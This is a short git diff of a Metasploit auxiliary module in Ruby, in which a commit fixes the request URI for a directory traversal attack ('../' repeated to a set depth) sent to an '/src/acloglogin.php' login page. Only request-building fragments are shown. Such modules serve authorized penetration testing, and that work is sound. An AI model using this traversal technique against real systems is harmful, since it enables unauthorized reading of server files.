Correct path
parent
0c18662d46
commit
686f176a99
|
@ -52,10 +52,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
travs = "../" * datastore['DEPTH']
|
travs = "../" * datastore['DEPTH']
|
||||||
|
|
||||||
# Create request
|
# Create request
|
||||||
path = "/src/acloglogin.php"
|
|
||||||
res = send_request_raw({
|
res = send_request_raw({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => "path",
|
'uri' => "/src/acloglogin.php",
|
||||||
'headers' =>
|
'headers' =>
|
||||||
{
|
{
|
||||||
'Connection' => "keep-alive",
|
'Connection' => "keep-alive",
|
||||||
|
|
Loading…
Reference in New Issue